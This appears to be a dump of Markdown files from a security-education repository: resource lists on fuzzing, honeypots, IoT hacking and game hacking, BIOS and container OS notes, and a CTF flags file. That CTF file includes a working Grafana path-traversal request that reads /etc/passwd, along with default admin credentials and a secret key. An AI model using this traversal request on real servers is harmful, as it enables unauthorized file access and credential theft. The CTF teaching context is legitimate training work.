language
stringlengths
0
24
filename
stringlengths
9
214
code
stringlengths
99
9.93M
Markdown
h4cker/fuzzing_resources/README.md
# Fuzzing Resources ## Commercial Fuzzers - [Synopsis Defensics](https://www.synopsys.com/software-integrity/security-testing/fuzz-testing.html) - [Code Intelligence](https://www.code-intelligence.com/) - [Mayhem for Code](https://forallsecure.com/mayhem-for-code) - [BeyondSecurity Fuzzer](https://www.beyondsecurity.com/solutions/bestorm-dynamic-application-security-testing) ## Community-supported/Open Source Fuzzers - [GitLab Protocol Fuzzer Community Edition](https://gitlab.com/gitlab-org/security-products/protocol-fuzzer-ce) - [Munity Fuzzer](https://github.com/Cisco-Talos/mutiny-fuzzer) - [Sulley](https://github.com/OpenRCE/sulley) - [Boofuzz](https://github.com/jtpereyda/boofuzz) - [Radamsa](https://github.com/aoh/radamsa) - [Zzuf](http://caca.zoy.org/wiki/zzuf) - [OWASP Zed Attack Proxy Fuzz Add-on](https://github.com/zaproxy/zap-core-help/wiki/HelpAddonsFuzzConcepts) - [American Fuzzy Lop](http://lcamtuf.coredump.cx/afl/) - [Honggfuzz](http://honggfuzz.com/) ## Free Tutorials - [Fuzzing with AFL - by Michael Macnair](https://www.youtube.com/watch?v=6YLz9IGAGLw&t=3752s) - [Attacking Antivirus Software's Kernel Driver](https://github.com/bee13oy/AV_Kernel_Vulns/tree/master/Zer0Con2017) - [Fuzzing the Windows Kernel - OffensiveCon 2020](https://github.com/yoava333/presentations/blob/master/Fuzzing%20the%20Windows%20Kernel%20-%20OffensiveCon%202020.pdf) - [Youtube Playlist of various fuzzing talks and presentations ](https://www.youtube.com/playlist?list=PLtPrYlwXDImiO_hzK7npBi4eKQQBgygLD) - [DerbyCon 2016: Fuzzing basics...or how to break software](http://www.irongeek.com/i.php?page=videos/derbycon6/411-fuzzing-basicshow-to-break-software-grid-aka-scott-m) - [TALOS Munity Fuzzer Tutorial](https://www.youtube.com/watch?v=FZyR6MgJCUs) - [A curated list of Fuzz-related topics](https://github.com/secfigo/Awesome-Fuzzing) maintained by [@secfigo](https://twitter.com/secfigo). Includes tools, books, free and paid courses, videos, and tutorials. ## Types of Fuzzing Techniques The following are the most common types of fuzzing categories: ### Mutation Mutation-based fuzzers use samples of valid input that are mutated randomly to produce malformed input. A dumb mutation fuzzer can simply select a valid sample input and alter parts of it randomly. You can build in greater intelligence by allowing the fuzzer to do some level of parsing of the samples to ensure it only modifies specific parts or doesn’t break the overall structure of the input so it’s immediately rejected by the program. Some protocols or file formats will incorporate checksums that will fail if they’re modified arbitrarily. A mutation-based fuzzer should usually fix these checksums so the input’s accepted for processing or the only code tested is the checksum validation and nothing else. ### Generation Generation-based fuzzers actually generate input from scratch rather than mutating existing input. They usually require some level of intelligence to construct input that makes at least some sense to the program, although generating completely random data would also technically be generation. Generation fuzzers often split a protocol or file format into chunks, which they can build up in a valid order, and randomly fuzz some of those chunks independently. This can create inputs that preserve their overall structure, but contain inconsistent data within it. The granularity of these chunks and the intelligence with which they’re constructed define the level of intelligence of the fuzzer. While mutation-based fuzzing can have a similar effect as generation fuzzing (as, over time, mutations will be randomly applied without completely breaking the input’s structure), generating inputs ensures this will be so. Generation fuzzing can also get deeper into a protocol more easily, as it can construct valid sequences of inputs applying fuzzing to specific parts of that communication. It also allows the fuzzer to act as a true client/server, generating correct, dynamic responses where these can’t be blindly replayed. ### Evolutionary Evolutionary fuzzing’s an advanced technique. It allows the fuzzer to use feedback from each test case to learn the format of the input over time.
Markdown
h4cker/game_hacking/README.md
# Game Hacking - The Ultimate Game Hacking Resource: A curated list of tools, tutorials, and much more for reverse engineering video games! https://github.com/dsasmblr/game-hacking - The Ultimate Online Game Hacking Resource: https://github.com/dsasmblr/hacking-online-games
Markdown
h4cker/honeypots_honeynets/README.md
# Honeypots and HoneyNets The following are several references and resources related to HoneyPots/HoneyNets. ## Community - [The HoneyNet Project](https://www.honeynet.org): an international 501c3 non-profit security research organization, dedicated to investigating the latest attacks and developing open source security tools to improve Internet security. With Chapters around the world, our volunteers have contributed to fight against malware (such as Confickr), discovering new attacks and creating security tools used by businesses and government agencies all over the world. The organization continues to be on the cutting edge of security research by working to analyze the latest attacks and educating the public about threats to information systems across the world. ## HoneyPots and Tools - [T-Pot](https://github.com/telekom-security/tpotce): an awesome collection of honeypots and additional tools. - [adbhoney](https://github.com/huuck/ADBHoney): Low interaction honeypot designed for Android Debug Bridge over TCP/IP - [ciscoasa](https://github.com/Cymmetria/ciscoasa_honeypot): A low interaction honeypot for the Cisco ASA component capable of detecting CVE-2018-0101, a DoS and remote code execution vulnerability. - [citrixhoneypot](https://github.com/MalwareTech/CitrixHoneypot): Detect and log CVE-2019-19781 scan and exploitation attempts. - [conpot](https://conpot.org/): Conpot is a low interactive server side Industrial Control Systems honeypot designed to be easy to deploy, modify and extend. By providing a range of common industrial control protocols we created the basics to build your own system, capable to emulate complex infrastructures to convince an adversary that he just found a huge industrial complex. - [cowrie](https://github.com/cowrie/cowrie): Cowrie is a medium to high interaction SSH and Telnet honeypot designed to log brute force attacks and the shell interaction performed by the attacker. In medium interaction mode (shell) it emulates a UNIX system in Python, in high interaction mode (proxy) it functions as an SSH and telnet proxy to observe attacker behavior to another system. - [dicompot](https://github.com/nsmfoo/dicompot): A Digital Imaging and Communications in Medicine (DICOM) Honeypot. - [dionaea](https://github.com/DinoTools/dionaea): Dionaea is meant to be a nepenthes successor, embedding python as scripting language, using libemu to detect shellcodes, supporting ipv6 and tls. - [elasticpot](https://gitlab.com/bontchev/elasticpot): An Elasticsearch Honeypot - [glutton](https://github.com/mushorg/glutton): Glutton provide SSH and a TCP proxy. SSH proxy works as a MITM between attacker and server to log everything in plain text. - [heralding](https://github.com/johnnykv/heralding): Sometimes you just want a simple honeypot that collects credentials, nothing more. Heralding is that honeypot! Currently the following protocols are supported: ftp, telnet, ssh, http, https, pop3, pop3s, imap, imaps, smtp, vnc, postgresql and socks5. - [honeypy](https://github.com/foospidy/HoneyPy): A low interaction honeypot with the capability to be more of a medium interaction honeypot. - [honeysap](https://github.com/SecureAuthCorp/HoneySAP): HoneySAP is a low-interaction research-focused honeypot specific for SAP services. It's aimed at learn the techniques and motivations behind attacks against SAP systems. - [honeytrap](https://github.com/armedpot/honeytrap/): Honeytrap is a network security tool written to observe attacks against TCP or UDP services. It runs as a daemon and starts server processes dynamically on requested ports. A server emulates a well-known service by simply sending captured network traffic to a connected host. - [ipphoney](https://gitlab.com/bontchev/ipphoney):A honeypot for the Internet Printing Protocol. - [mailoney](https://github.com/awhitehatter/mailoney): Mailoney is a SMTP Honeypot I wrote just to have fun learning Python. - [medpot](https://github.com/schmalle/medpot): Health Level Seven International (HL7) / Fast Healthcare Interoperability Resources (FHIR) Honeypot. - [rdpy](https://github.com/citronneur/rdpy): Remote Desktop Protocol Honeypot written in Python. - [snare](http://mushmush.org/): SNARE, a web application honeypot sensor, is the successor of Glastopf. SNARE has feature parity with Glastopf and allows to convert existing web pages into attack surfaces. - [tanner](http://mushmush.org/): TANNER is SNARES "brain". Every event is send from SNARE to TANNER, gets evaluated and TANNER decides how SNARE should respond to the client. This allows us to change the behaviour of many sensors on the fly. We are providing a TANNER instance for your use, but there is nothing stopping you from setting up your own instance.
Markdown
h4cker/iot_hacking/flags.md
# IoT Hacking CLUS CTF Flags The following are the CTF flags for the grafana vulnerability in the IoT device: The vulnerability is caused by plugin module, which is able to serve the static file inside the plugin folder. But for lock of check, attacker can use ../ to step up from the plugin folder to parent foler and download arbitrary files. To exploit the vulnerabilty, you should know a valid plugin id, such as alertlist, here are some of common plugin ids: ``` alertlist cloudwatch dashlist elasticsearch graph graphite heatmap influxdb mysql opentsdb pluginlist postgres prometheus stackdriver table text ``` Send following request to retrieve the **/etc/passwd ** (you can replace the alertlist with any valid plugin id): ``` GET /public/plugins/alertlist/../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: http://192.168.3.126:3000 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Connection: close ``` <img width="791" alt="image" src="https://github.com/The-Art-of-Hacking/h4cker/assets/1690898/13f46b3b-1948-4f6e-a6bf-bf28a3c4fc05"> ## Getting the Admin Password and Secret Key It is just the default example configuration: ``` # default admin user, created on startup ;admin_user = admin # default admin password, can be changed before first start of grafana, or in profile settings ;admin_password = admin ... # used for signing ;secret_key = SW2YcwTIb9zpOOhoPsMm ``` <img width="1920" alt="image" src="https://github.com/The-Art-of-Hacking/h4cker/assets/1690898/e306aa9c-a980-4001-bc6d-2cbacf7d8b0a">
Markdown
h4cker/iot_hacking/README.md
# Internet of Things (IoT) Hacking Resources The Internet of Things (IoT) Hacking Resources refer to an array of tools and frameworks used to ensure the security of IoT devices and networks. ## Analysis Frameworks - [EXPLIoT](https://gitlab.com/expliot_framework/expliot): This is a penetrating testing framework that is akin to Metasploit, but it specifically caters to Internet of Things (IoT) applications. - [FACT - The Firmware Analysis and Comparison Tool](https://fkie-cad.github.io/FACT_core/): A comprehensive static analysis tool that specializes in firmware extraction, plugin-facilitated analysis, and comparison between different firmware versions. To understand more, watch this [conference talk](https://passthesalt.ubicast.tv/videos/improving-your-firmware-security-analysis-process-with-fact/) discussing enhancements in the firmware security analysis process using FACT. - [FwAnalyzer](https://github.com/cruise-automation/fwanalyzer): Designed to evaluate firmware security via customized rule-based analysis. It's an excellent complementary step in DevSecOps, analogous to Continuous Integration (CI) in function. - [HAL – The Hardware Analyzer](https://github.com/emsec/hal): An all-encompassing reverse engineering tool that provides a manipulation framework for gate-level netlists. - [HomePWN](https://github.com/ElevenPaths/HomePWN): Consider it your Swiss Army Knife for penetration testing of IoT devices. - [IoTSecFuzz](https://gitlab.com/invuls/iot-projects/iotsecfuzz): This framework automates the security analysis of IoT layers, including hardware, software, and communication. - [Killerbee](https://github.com/riverloopsec/killerbee): An established framework for the testing and auditing of ZigBee and IEEE 802.15.4 networks. - [PRET](https://github.com/RUB-NDS/PRET): The go-to toolkit for printer exploitation. - [Routersploit](https://github.com/threat9/routersploit): A dedicated framework specifically designed to exploit embedded devices. ## Advanced Tools for Binary and Firmware Analysis - [Binwalk](https://github.com/ReFirmLabs/binwalk): This powerful tool delves into binaries to identify "interesting" elements and also facilitates the extraction of arbitrary files. - [emba](https://github.com/e-m-b-a/emba): Designed specifically to analyze the Linux-based firmware of embedded devices, emba provides a comprehensive framework for firmware scrutiny. - [Firmadyne](https://github.com/firmadyne/firmadyne): This resource aims to emulate and conduct penetration tests on various firmwares, providing a simulation environment for security testing. - [Firmwalker](https://github.com/craigz28/firmwalker): This tool specializes in exploring extracted firmware images, searching for relevant files and information. - [Firmware Slap](https://github.com/ChrisTheCoolHut/Firmware_Slap): A unique tool for discovering vulnerabilities in firmware through the method of concolic analysis and function clustering. - [Ghidra](https://ghidra-sre.org/): Ghidra is a comprehensive Software Reverse Engineering suite. It can manage arbitrary binaries when provided with the CPU architecture and endianness of the binary. - [Radare2](https://github.com/radare/radare2): This is a versatile Software Reverse Engineering framework. Capable of handling popular formats and arbitrary binaries, it boasts an extensive command line toolkit. - [Trommel](https://github.com/CERTCC/trommel): Trommel conducts a detailed search through extracted firmware images, hunting for relevant files and intriguing information. ## Tools for Firmware Extraction and Manipulation - [FACT Extractor](https://github.com/fkie-cad/fact_extractor): This intelligent tool identifies container formats automatically and triggers the appropriate extraction tool, thereby streamlining the process. - [Firmware Mod Kit](https://github.com/rampageX/firmware-mod-kit/wiki): This kit provides a range of extraction tools compatible with various container formats, offering a versatile solution for firmware modification. - [The SRecord package](http://srecord.sourceforge.net/): This package encompasses a suite of tools for manipulating EPROM files. Its functionality includes the ability to convert numerous binary formats, providing an essential resource for binary file conversion and manipulation. - [JTAGenum](https://github.com/cyphunk/JTAGenum) - Add JTAG capabilities to an Arduino. - [OpenOCD](http://openocd.org/) - Free and Open On-Chip Debugging, In-System Programming and Boundary-Scan Testing. ## Misc Tools - [Cotopaxi](https://github.com/Samsung/cotopaxi) - Set of tools for security testing of Internet of Things devices using specific network IoT protocols. - [dumpflash](https://github.com/ohjeongwook/dumpflash) - Low-level NAND Flash dump and parsing utility. - [flashrom](https://github.com/flashrom/flashrom) - Tool for detecting, reading, writing, verifying and erasing flash chips. - [Samsung Firmware Magic](https://github.com/chrivers/samsung-firmware-magic) - Decrypt Samsung SSD firmware updates. ## Hardware Tools - [Bus Blaster](http://dangerousprototypes.com/docs/Bus_Blaster) - Detects and interacts with hardware debug ports like [UART](https://en.wikipedia.org/wiki/Universal_asynchronous_receiver-transmitter) and [JTAG](https://en.wikipedia.org/wiki/JTAG). - [Bus Pirate](http://dangerousprototypes.com/docs/Bus_Pirate) - Detects and interacts with hardware debug ports like UART and JTAG. - [GreatFET One](https://www.adafruit.com/product/4234) - If you need an interface to an external chip, a logic analyzer, a debugger, or just a whole lot of pins to bit-bang, the versatile GreatFET One is the tool for you. - [Shikra](https://int3.cc/products/the-shikra) - Detects and interacts with hardware debug ports like UART and JTAG. Among other protocols. - [JTAGULATOR](http://www.grandideastudio.com/jtagulator/) - Detects JTAG Pinouts fast. - [Saleae](https://www.saleae.com/) - Easy to use Logic Analyzer that support many protocols :euro:. - [Ikalogic](https://www.ikalogic.com/pages/logic-analyzer-sp-series-sp209) - Alternative to Saleae logic analyzers :euro:. - [HydraBus](https://hydrabus.com/hydrabus-1-0-specifications/) - Open source multi-tool hardware similar to the BusPirate but with NFC capabilities. - [ChipWhisperer](https://newae.com/chipwhisperer/) - Detects Glitch/Side-channel attacks. - [Glasgow](https://github.com/GlasgowEmbedded/Glasgow) - Tool for exploring and debugging different digital interfaces. - [J-Link](https://www.segger.com/products/debug-probes/j-link/models/model-overview/) - J-Link offers USB powered JTAG debug probes for multiple different CPU cores :euro:. ## Bluetooth BLE Tools - [UberTooth One](https://greatscottgadgets.com/ubertoothone/) - Open source 2.4 GHz wireless development platform suitable for Bluetooth experimentation. - [Bluefruit LE Sniffer](https://www.adafruit.com/product/2269) - Easy to use Bluetooth Low Energy sniffer. ## ZigBee Tools - [ApiMote](http://apimote.com) - ZigBee security research hardware for learning about and evaluating the security of IEEE 802.15.4/ZigBee systems. Killerbee compatible. - Atmel RZUSBstick - Discontinued product. Lucky if you have one! - Tool for development, debugging and demonstration of a wide range of low power wireless applications including IEEE 802.15.4, 6LoWPAN, and ZigBee networks. Killerbee compatible. - [Freakduino](https://freaklabsstore.com/index.php?main_page=product_info&cPath=22&products_id=219&zenid=fpmu2kuuk4abjf6aurt3bjnfk4) - Low Cost Battery Operated Wireless Arduino Board that can be turned into a IEEE 802.15.4 protocol sniffer. ### SDR Tools - [RTL-SDR](https://www.rtl-sdr.com/buy-rtl-sdr-dvb-t-dongles/) - Cheapest SDR for beginners. It is a computer based radio scanner for receiving live radio signals frequencies from 500 kHz up to 1.75 GHz. - [HackRF One](https://greatscottgadgets.com/hackrf/) - Software Defined Radio peripheral capable of transmission or reception of radio signals from 1 MHz to 6 GHz (half-duplex). - [YardStick One](https://greatscottgadgets.com/yardstickone/) - Half-duplex sub-1 GHz wireless transceiver. - [LimeSDR](https://www.crowdsupply.com/lime-micro/limesdr) - Software Defined Radio peripheral capable of transmission or reception of radio signals from 100 KHz to 3.8 GHz (full-duplex). - [BladeRF 2.0](https://www.nuand.com/bladerf-2-0-micro/) - Software Defined Radio peripheral capable of transmission or reception of radio signals from 47 MHz to 6 GHz (full-duplex). - [USRP B Series](https://www.ettus.com/product-categories/usrp-bus-series/) - Software Defined Radio peripheral capable of transmission or reception of radio signals from 70 MHz to 6 GHz (full-duplex). ### RFID NFC Tools - [Proxmark 3 RDV4](https://www.proxmark.com/) - Powerful general purpose RFID tool. From Low Frequency (125kHz) to High Frequency (13.56MHz) tags. - [ChamaleonMini](http://chameleontiny.com/) - Programmable, portable tool for NFC security analysis. - [HydraNFC](https://hydrabus.com/hydranfc-1-0-specifications/) - Powerful 13.56MHz RFID / NFC platform. Read / write / crack / sniff / emulate. ## Free Training - [CSAW Embedded Security Challenge 2019](https://github.com/TrustworthyComputing/csaw_esc_2019) - CSAW 2019 Embedded Security Challenge (ESC). - [Hardware Hacking 101](https://github.com/rdomanski/hardware_hacking/tree/master/my_talks/Hardware_Hacking_101) - Workshop @ BSides Munich 2019. - [IoTGoat](https://github.com/scriptingxss/IoTGoat) - IoTGoat is a deliberately insecure firmware based on OpenWrt. - [Rhme-2015](https://github.com/Riscure/RHme-2015) - First riscure Hack me hardware CTF challenge. - [Rhme-2016](https://github.com/Riscure/Rhme-2016) - Riscure Hack me 2 is a low level hardware CTF challenge. - [Rhme-2017/2018](https://github.com/Riscure/Rhme-2017) - Riscure Hack Me 3 embedded hardware CTF 2017-2018. ## Websites - [Hacking Printers Wiki](http://hacking-printers.net/wiki/index.php/Main_Page) - All things printer. - [OWASP Embedded Application Security Project](https://owasp.org/www-project-embedded-application-security/) - Development best practices and list of hardware and software tools. - [OWASP Internet of Things Project](https://owasp.org/www-project-internet-of-things/) - IoT common vulnerabilities and attack surfaces. - [Router Passwords](https://192-168-1-1ip.mobi/default-router-passwords-list/) - Default login credential database sorted by manufacturer. - [Siliconpr0n](https://siliconpr0n.org/) - A Wiki/Archive of all things IC reversing. ### Blogs - [RTL-SDR](https://www.rtl-sdr.com/) - [/dev/ttyS0's Embedded Device Hacking](http://www.devttys0.com/blog/) - [Exploiteers](https://www.exploitee.rs/) - [Hackaday](https://hackaday.com) - [jcjc's Hack The World](https://jcjc-dev.com/) - [Quarkslab](https://blog.quarkslab.com/) - [wrong baud](https://wrongbaud.github.io/) - [Firmware Security](https://firmwaresecurity.com/) - [PenTestPartners](https://www.pentestpartners.com/internet-of-things/) - [Attify](https://blog.attify.com/) - [Patayu](https://payatu.com/blog) - [GracefulSecurity - Hardware tag](https://gracefulsecurity.com/category/hardware/) - [Black Hills - Hardware Hacking tag](https://www.blackhillsinfosec.com/tag/hardware-hacking/) ### Tutorials and Technical Background - [Azeria Lab](https://azeria-labs.com/) - Miscellaneous ARM related Tutorials. - [JTAG Explained](https://blog.senr.io/blog/jtag-explained#) - A walkthrough covering UART and JTAG bypassing a protected login shell. - [Reverse Engineering Serial Ports](http://www.devttys0.com/2012/11/reverse-engineering-serial-ports/) - Detailed tutorial about how to spot debug pads on a PCB. - [UART explained](https://www.mikroe.com/blog/uart-serial-communication) - An in depth explanation of the UART protocol. ## OWASP Resources - [OWASP Internet of Things Project](https://owasp.org/www-project-internet-of-things/) - [OWASP Firmware Security Testing Methodology](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/) ## IoT Hacking Communities - [IoT Village](https://www.iotvillage.org/) - [BuildItSecure.ly](http://builditsecure.ly/) - [Secure Internet of Things Project (Stanford)](http://iot.stanford.edu/people.html) ## Training Available Through ICS-CERT - https://ics-cert.us-cert.gov/Training-Available-Through-ICS-CERT ## Interesting Blogs - <http://iotpentest.com/> - <https://blog.attify.com> - <https://payatu.com/blog/> - <http://jcjc-dev.com/> - <https://w00tsec.blogspot.in/> - <http://www.devttys0.com/> - <https://www.rtl-sdr.com/> - <https://keenlab.tencent.com/en/> - <https://courk.cc/> - <https://iotsecuritywiki.com/> - <https://cybergibbons.com/> - <http://firmware.re/> ## CTFs Related to IoT's and Embedded Devices - <https://github.com/hackgnar/ble_ctf> - <https://www.microcorruption.com/> - <https://github.com/Riscure/Rhme-2016> - <https://github.com/Riscure/Rhme-2017> ## YouTube Channels for Embedded hacking - [Liveoverflow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) - [Binary Adventure](https://www.youtube.com/channel/UCSLlgiYtOXZnYPba_W4bHqQ) - [EEVBlog](https://www.youtube.com/user/EEVblog) - [JackkTutorials](https://www.youtube.com/channel/UC64x_rKHxY113KMWmprLBPA) - [Craig Smith](https://www.youtube.com/channel/UCxC8G4Oeed4N0-GVeDdFoSA) ## Reverse Enginnering Tools - [IDA Pro](https://www.youtube.com/watch?v=fgMl0Uqiey8) - [GDB](https://www.youtube.com/watch?v=fgMl0Uqiey8) - [Radare2](https://radare.gitbooks.io/radare2book/content/) ## MQTT - [Introduction](https://www.hivemq.com/blog/mqtt-essentials-part-1-introducing-mqtt) - [Hacking the IoT with MQTT](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b) - [thoughts about using IoT MQTT for V2V and Connected Car from CES 2014](https://mobilebit.wordpress.com/tag/mqtt/) - [Nmap](https://nmap.org/nsedoc/lib/mqtt.html) - [The Seven Best MQTT Client Tools](https://www.hivemq.com/blog/seven-best-mqtt-client-tools) - [A Guide to MQTT by Hacking a Doorbell to send Push Notifications](https://youtu.be/J_BAXVSVPVI) ## CoAP - [Introduction](http://coap.technology/) - [CoAP client Tools](http://coap.technology/tools.html) - [CoAP Pentest Tools](https://bitbucket.org/aseemjakhar/expliot_framework) - [Nmap](https://nmap.org/nsedoc/lib/coap.html) ## Automobile - [Introduction and protocol Overview](https://www.youtube.com/watch?v=FqLDpHsxvf8) - [PENTESTING VEHICLES WITH CANTOOLZ](https://www.blackhat.com/docs/eu-16/materials/eu-16-Sintsov-Pen-Testing-Vehicles-With-Cantoolz.pdf) - [Building a Car Hacking Development Workbench: Part1](https://blog.rapid7.com/2017/07/11/building-a-car-hacking-development-workbench-part-1/) - [CANToolz - Black-box CAN network analysis framework](https://github.com/CANToolz/CANToolz) ## Radio IoT Protocols Overview - [Understanding Radio](https://www.taitradioacademy.com/lessons/introduction-to-radio-communications-principals/) - [Signal Processing]() - [Software Defined Radio](https://www.allaboutcircuits.com/technical-articles/introduction-to-software-defined-radio/) - [Gnuradio](https://wiki.gnuradio.org/index.php/Guided_Tutorial_GRC#Tutorial:_GNU_Radio_Companion) - [Creating a flow graph](https://blog.didierstevens.com/2017/09/19/quickpost-creating-a-simple-flow-graph-with-gnu-radio-companion/) - [Analysing radio signals](https://www.rtl-sdr.com/analyzing-433-mhz-transmitters-rtl-sdr/) - [Recording specific radio signal](https://www.rtl-sdr.com/freqwatch-rtl-sdr-frequency-scanner-recorder/) - [Replay Attacks](https://www.rtl-sdr.com/tutorial-replay-attacks-with-an-rtl-sdr-raspberry-pi-and-rpitx/) ## Base transceiver station (BTS) - [what is base tranceiver station](https://en.wikipedia.org/wiki/Base_transceiver_station) - [How to Build Your Own Rogue GSM BTS](https://www.evilsocket.net/2016/03/31/how-to-build-your-own-rogue-gsm-bts-for-fun-and-profit/) ## GSM & SS7 Pentesting - [Introduction to GSM Security](http://www.pentestingexperts.com/introduction-to-gsm-security/) - [GSM Security 2](https://www.ehacking.net/2011/02/gsm-security-2.html) - [vulnerabilities in GSM security with USRP B200](https://ieeexplore.ieee.org/document/7581461/) - [Security Testing 4G (LTE) Networks](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-44con-lte-presentation-2012-09-11.pdf) - [Case Study of SS7/SIGTRAN Assessment](https://nullcon.net/website/archives/pdf/goa-2017/case-study-of-SS7-sigtran.pdf) - [Telecom Signaling Exploitation Framework - SS7, GTP, Diameter & SIP](https://github.com/SigPloiter/SigPloit) - [ss7MAPer – A SS7 pen testing toolkit](https://n0where.net/ss7-pentesting-toolkit-ss7maper) - [Introduction to SIGTRAN and SIGTRAN Licensing](https://www.youtube.com/watch?v=XUY6pyoRKsg) - [SS7 Network Architecture](https://youtu.be/pg47dDUL1T0) - [Introduction to SS7 Signaling](https://www.patton.com/whitepapers/Intro_to_SS7_Tutorial.pdf) ## Zigbee & Zwave - [Introduction and protocol Overview](http://www.informit.com/articles/article.aspx?p=1409785) - [Hacking Zigbee Devices with Attify Zigbee Framework](https://blog.attify.com/hack-iot-devices-zigbee-sniffing-exploitation/) - [Hands-on with RZUSBstick](https://uk.rs-online.com/web/p/radio-frequency-development-kits/6962415/) - [ZigBee & Z-Wave Security Brief](http://www.riverloopsecurity.com/blog/2018/05/zigbee-zwave-part1/) ## BLE - [Traffic Engineering in a Bluetooth Piconet](http://www.diva-portal.org/smash/get/diva2:833159/FULLTEXT01.pdf) - [BLE Characteristics](https://devzone.nordicsemi.com/tutorials/b/bluetooth-low-energy/posts/ble-characteristics-a-beginners-tutorial0) Reconnaissance (Active and Passive) with HCI Tools - [btproxy](https://github.com/conorpp/btproxy) - [hcitool & bluez](https://www.pcsuggest.com/linux-bluetooth-setup-hcitool-bluez) - [Testing With GATT Tool](https://www.jaredwolff.com/blog/get-started-with-bluetooth-low-energy/) - [Cracking encryption](https://github.com/mikeryan/crackle) ## Mobile security (Android & iOS) - [Android](https://www.packtpub.com/hardware-and-creative/learning-pentesting-android-devices) - [Android Pentest Video Course](https://www.youtube.com/watch?v=zHknRia3I6s&list=PLWPirh4EWFpESLreb04c4eZoCvJQJrC6H) - [IOS Pentesting](https://web.securityinnovation.com/hubfs/iOS%20Hacking%20Guide.pdf?) ## ARM - [Azeria Labs](https://azeria-labs.com/) - [ARM EXPLOITATION FOR IoT](https://www.exploit-db.com/docs/english/43906-arm-exploitation-for-iot.pdf) ## Firmware Pentest - [Firmware analysis and reversing](https://www.youtube.com/watch?v=G0NNBloGIvs) - [Firmware emulation with QEMU](https://www.youtube.com/watch?v=G0NNBloGIvs) - [Dumping Firmware using Buspirate](http://iotpentest.com/tag/pulling-firmware/) ## IoT hardware Overview - [IoT Hardware Guide](https://www.postscapes.com/internet-of-things-hardware/) ## Hardware Tools - [Bus Pirate](https://www.sparkfun.com/products/12942) - [EEPROM readers](https://www.ebay.com/bhp/eeprom-reader) - [Jtagulator / Jtagenum](https://www.adafruit.com/product/1550) - [Logic Analyzer](https://www.saleae.com/) - [The Shikra](https://int3.cc/products/the-shikra) - [FaceDancer21 (USB Emulator/USB Fuzzer)](https://int3.cc/products/facedancer21) - [RfCat](https://int3.cc/products/rfcat) - [IoT Exploitation Learning Kit](https://www.attify.com/attify-store/iot-exploitation-learning-kit) - [Hak5Gear- Hak5FieldKits](https://hakshop.com/) - [Ultra-Mini Bluetooth CSR 4.0 USB Dongle Adapter](https://www.ebay.in/itm/Ultra-Mini-Bluetooth-CSR-4-0-USB-Dongle-Adapter-Black-Golden-with-2-yr-wrnty-/332302813975) - [Attify Badge - UART, JTAG, SPI, I2C (w/ headers)](https://www.attify-store.com/products/attify-badge-assess-security-of-iot-devices) ## Hardware Interfaces - [Serial Terminal Basics](https://learn.sparkfun.com/tutorials/terminal-basics/all) - [Reverse Engineering Serial Ports](http://www.devttys0.com/2012/11/reverse-engineering-serial-ports/) ### UART - [Identifying UART interface](https://www.mikroe.com/blog/uart-serial-communication) - [onewire-over-uart](https://github.com/dword1511/onewire-over-uart) - [Accessing sensor via UART](http://home.wlu.edu/~levys/courses/csci250s2017/SensorsSignalsSerialSockets.pdf) ### JTAG - [Identifying JTAG interface](https://blog.senr.io/blog/jtag-explained) - [NAND Glitching Attack](http://www.brettlischalk.com/posts/nand-glitching-wink-hub-for-root)
Markdown
h4cker/linux-hardening/BIOS-best-practices.md
# BIOS and Security Settings BIOS, or Basic Input/Output System, is an essential part of a computer's operation, as it initiates the boot process and provides communication between the operating system and the hardware. As such, the security of the BIOS is critical to the overall security of the system. The following are some best practices for BIOS security: | Best Practice | Description | |---------------|-------------| | Set a Strong BIOS Password | Prevents unauthorized users from accessing and changing BIOS settings. | | Enable Secure Boot | Only allows software with recognized signatures to boot, protecting against malicious code. | | Disable Unnecessary Hardware | Reduces the attack surface by turning off unused hardware components, if supported by the BIOS. | | Regularly Update BIOS Firmware | Fixes potential security vulnerabilities. Make sure to download updates directly from the manufacturer's website. | | Enable BIOS/UEFI Firmware Intrusion Detection | Provides notification if BIOS settings have been changed, allowing detection of unauthorized modifications. | | Use Full Disk Encryption (FDE) | Protects data on the hard drive by requiring a password to decrypt it. | | Enable TPM (Trusted Platform Module) | A specialized chip that stores RSA encryption keys specific to the host system for hardware authentication. | | Limit Physical Access | Prevents unauthorized BIOS access by securing physical systems in locked rooms or cases and using security cables. |
Markdown
h4cker/linux-hardening/container_optimized_linux_images.md
# Container-optimized Linux distributions Container-optimized Linux distributions are designed specifically for deploying, running, and managing containers. Some of the popular distributions include: | Linux Distribution | Official Link | |-------------------|---------------| | Alpine Linux | [https://www.alpinelinux.org](https://www.alpinelinux.org) | | CoreOS (Container Linux) | the distribution is discontinued | | Fedora CoreOS | [https://getfedora.org/en/coreos](https://getfedora.org/en/coreos) | | RancherOS | [https://rancher.com/products/rancher/rancheros](https://rancher.com/products/rancher/rancheros) | | Google's Container-Optimized OS (COS) | [https://cloud.google.com/container-optimized-os](https://cloud.google.com/container-optimized-os) | | Amazon Linux 2 (with ECS-Optimized AMI) | [https://aws.amazon.com/amazon-linux-2](https://aws.amazon.com/amazon-linux-2) | | Ubuntu Core | [https://ubuntu.com/core](https://ubuntu.com/core) | | Photon OS | [https://vmware.github.io/photon](https://vmware.github.io/photon) | 1. **Alpine Linux**: Known for its small footprint, security features, and simplicity, Alpine Linux is a common choice for containerized applications. It's often used for Docker containers due to its size (typically around 5MB) and efficiency. 2. **CoreOS (Container Linux)**: CoreOS is a popular container-optimized OS with built-in support for Docker and Kubernetes. It features automatic updates and scalability features. However, as of May 2020, CoreOS has been discontinued and its functionalities have been integrated into Fedora CoreOS and Red Hat OpenShift. 3. **Fedora CoreOS**: Following the acquisition of CoreOS by Red Hat, Fedora CoreOS is its spiritual successor. It is designed for scalability and security, with automatic updates and rollbacks, as well as integration with Kubernetes. 4. **RancherOS**: RancherOS is a lightweight Linux distribution purpose-built for running Docker containers. It removes most of the traditional OS utilities and replaces them with Docker for both system and user services. 5. **Google's Container-Optimized OS (COS)**: COS is a lightweight, secure, and reliable operating system from Google. Designed specifically for running containerized applications on Google Cloud Platform, it features automatic updates, security enhancements, and a strong focus on running containers. 6. **Amazon Linux 